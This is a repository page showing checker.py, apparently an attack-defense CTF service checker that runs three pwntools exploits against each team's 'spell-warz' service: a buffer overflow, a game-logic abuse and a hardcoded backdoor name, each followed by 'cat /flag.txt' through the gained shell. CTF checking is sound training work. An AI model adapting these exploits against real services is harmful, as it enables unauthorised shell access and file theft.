myitinos
/
spell-warz-again-final
1
0
派生 0
代码 工单 0 合并请求 0 版本发布 0 百科 动态
您最多选择25个主题 主题必须以字母或数字开头,可以包含连字符 (-),并且长度不得超过35个字符
11 提交
1 分支
456 KiB
目录树: d16a333427
分支列表 标签列表
${ item.name }
创建分支 ${ searchTerm }
从 'd16a333427'
${ noResults }
spell-warz-again-final/checker.py

103 行
2.7 KiB
原始文件 普通视图 文件历史

update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update checker
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update
5 年前
update checker
5 年前
update
5 年前
update
5 年前
 
  1. #! /usr/bin/env python2
  2. # from pwn import context, remote
  3. from pwn import remote, context
  4. from multiprocessing import pool
  5. context.log_level = "error"
  6. 

  7. HOST = "192.168.2.20"
  8. TOTAL_TEAMS = 10
  9. FORMAT = "SlashRootCTF"
  10. 

  11. 

  12. def poc0(host, port):
  13.     with remote(host, port) as p:
  14.         p.recvuntil(">")
  15.         p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
  16.         msg = p.recvuntil(">")
  17.         # print(msg)
  18.         if "young" in msg:
  19.             p.sendline("y")
  20.             p.recvuntil(">")
  21.             p.sendline("2")
  22.             p.recvuntil(">")
  23.             p.sendline("4")
  24.             p.recvuntil(">")
  25.             p.sendline("y")
  26.             for _ in xrange(10):
  27.                 p.recvuntil(">")
  28.                 p.sendline("99")
  29.             p.sendline("cat /flag.txt")
  30.             flag = p.recvuntil("}")
  31.             # print flag
  32.             if FORMAT in flag:
  33.                 return True
  34.             else:
  35.                 return False
  36.         else:
  37.             return False
  38. 

  39. 

  40. def poc1(host, port):
  41.     with remote(host, port) as p:
  42.         p.recvuntil(">")
  43.         p.sendline("Leo")
  44.         p.recvuntil(">")
  45.         p.sendline("y")
  46.         for _ in range(2):
  47.             p.recvuntil(">")
  48.             p.sendline("3")
  49.             p.recvuntil(">")
  50.             p.sendline("0")
  51.             if "Who" in p.recvuntil(">"):
  52.                 return False
  53.             p.sendline("y")
  54.             p.recvuntil(">")
  55.             p.sendline("1")
  56.         p.recvuntil(">")
  57.         p.sendline("4")
  58.         p.recvuntil(">")
  59.         p.sendline("y")
  60.         for _ in range(10):
  61.             p.recvuntil(">")
  62.             p.sendline("99")
  63.         p.sendline("cat /flag.txt")
  64.         flag = p.recvuntil("}")
  65.         if FORMAT in flag:
  66.             return True
  67.         else:
  68.             return False
  69. 

  70. 

  71. def poc2(host, port):
  72.     with remote(host, port) as p:
  73.         p.recvuntil(">")
  74.         p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
  75.         p.recvuntil(">")
  76.         p.sendline("y")
  77.         p.recvuntil(">")
  78.         p.sendline("6")
  79.         if "Lv: 1000000" in p.recvuntil(">"):
  80.             p.sendline("2")
  81.             p.recvuntil(">")
  82.             p.sendline("4")
  83.             p.recvuntil(">")
  84.             p.sendline("y")
  85.             for _ in xrange(10):
  86.                 p.recvuntil(">")
  87.                 p.sendline("99")
  88.             p.sendline("cat /flag.txt")
  89.             flag = p.recvuntil("}")
  90.             if FORMAT in flag:
  91.                 return True
  92.             else:
  93.                 return False
  94.         else:
  95.             return False
  96. 

  97. 

  98. if __name__ == "__main__":
  99.     for i in range(1, TOTAL_TEAMS+1):
  100.         r0 = poc0(HOST, (60004 + (i*100)))
  101.         r1 = poc1(HOST, (60004 + (i*100)))
  102.         r2 = poc2(HOST, (60004 + (i*100)))
  103.         print("Team [%s] %s %s %s" % (i, r0, r1, r2))